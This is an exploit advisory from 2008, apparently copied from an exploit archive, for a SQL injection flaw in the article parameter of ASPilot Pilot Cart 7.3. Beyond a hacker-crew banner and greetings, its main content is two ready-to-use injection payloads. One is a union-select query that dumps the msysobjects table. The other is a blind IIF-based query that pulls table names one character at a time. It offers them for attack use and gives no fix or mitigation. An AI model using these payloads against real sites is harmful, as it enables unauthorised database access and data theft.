ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability
# Published : 2008-06-09
# Author : Bl@ckbe@rD
# Previous Title : Telephone Directory 2008 (SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : Realm CMS <= 2.3 Multiple Remote Vulnerabilities

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /'             __  /'__`        / __  /'__`       /  ___    |
|  /_,     ___   /_/_L     ___  ,_/ /   _ __  __/    |
|  /_/  /' _ ` / /_/__<_  /'___  /    /`'__ ___``  |
|       / /    / L / __/  _  _   / / L  |
|       _ _ __   ____/ ____\ __\ ____/ _   ____/ |
|       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/   /___/  |
|                   ____/ >> Kings of injection                      |
|                   /___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

[+] Script Name    : Pilot Cart 7.3 Remote SQL Injection Exploit

|+| Team           : injEct0r5

[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Script URL     : www.pilotcart.com

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

--//-->

[+] Expl0iT :

pilot.asp?pg=kb&article={SQL}

{SQL} -->  115+union+select+Name,Name,Name+from+msysobjects

Or blind it :

{SQL} -->  IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00

--//-->

[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...

# www.Syue.com [2008-06-09]